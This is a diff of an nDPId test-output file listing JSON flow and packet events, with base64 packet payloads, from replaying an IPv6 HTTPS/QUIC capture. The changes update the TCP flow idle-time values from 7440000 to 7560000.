00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_ipv6.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1448269123954} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} -00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} +00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\/DtzNZRMDI1AdhpfiGrZQ0z8Xo88wCgAQAEQ0hMTxcAAABQQUQAlQEAAFNOSQCiAQAAU1RLANwBAABWRVIA4AEAAENDUwDoAQAATk9OQwgCAABNU1BDDAIAAEFFQUQQAgAAVUFJRDACAABTQ0lEQAIAAFRDSUREAgAAUERNREgCAABTUkJGTAIAAElDU0xQAgAAUFVCU3ACAABTQ0xTdAIAAEtFWFN4AgAAQ09QVHgCAABDQ1JUkAIAAElSVFSUAgAAQ0VUVjgDAABDRkNXPAMAAFNGQ1dAAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5pdP6VATCysYcS+6UyHFs91qYSgNdeDzmk0IEyIe5t2+bJKAI2qamMt0i7KMYplR0K0jnCGwmAm\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\/yG69qYF+ZOXnLeZQlagMSAtKsuormBERnE1N5BArSjLGqyjEsI7xMsjf+GWiD9zqRxEMc6cBgFvzaEvMvxi2SGPZg7npVciNOVP9ZU7k0lklFQEmkIVXhAz857PhdAM9F8uaoJzSnjSvvppgNKNbAOmmtmPDeC+pIAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0p26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127960,"flow_last_seen":1448269127960,"flow_idle_time":180000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1448269127960,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1448269127960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":260,"pkt_l4_len":206,"thread_ts_msec":1448269127960,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAM4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwDOCoAMj5N114hr41MJBd7sKG9JfODv2KzX0uexKi4OUzkr936AyksmjfKzejWhR1IllABVz6\/Nd8+DDPRvVbNJa4sAljMB\/byd9EnDrnASdvNnincHpyqVPP90d4TSxj+ARZa\/L622T2LNfPxOM6m\/si1ZmPjMCf2wR7DzkfTBciJe2oZugnMhbWbTFVoln8LtSZhpET4oRj3Jk\/IY0Vhm0AHAVNXjHBEt89UVS7Gr6h9OBH5HRJ1TIdTk4GJ40SQl9lgo1l4eCx0="} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1448269128003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":143,"pkt_l4_len":89,"thread_ts_msec":1448269128003,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAAFkRMyoAFFBACwwCAAAAAAAAAF8qAA1AAAEAA3qswP\/+pw1MAbvXaQBZLuIAB1nnejc74Zg5YssedTReRP0KRIf1hcs3Aafoe+Tuwy6JT\/77UOdg9PcT9s8XDyyGEBG\/Mph8KZAg9aAfxnp6BrSLMfMbzThg3fGY8Pw0dHA="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1448269128028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269128028,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwAtCd8Mj5N114hr41MKZOnBWgR9A+MJ4bypcpF9U29vj07q+fvNp9EO"} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 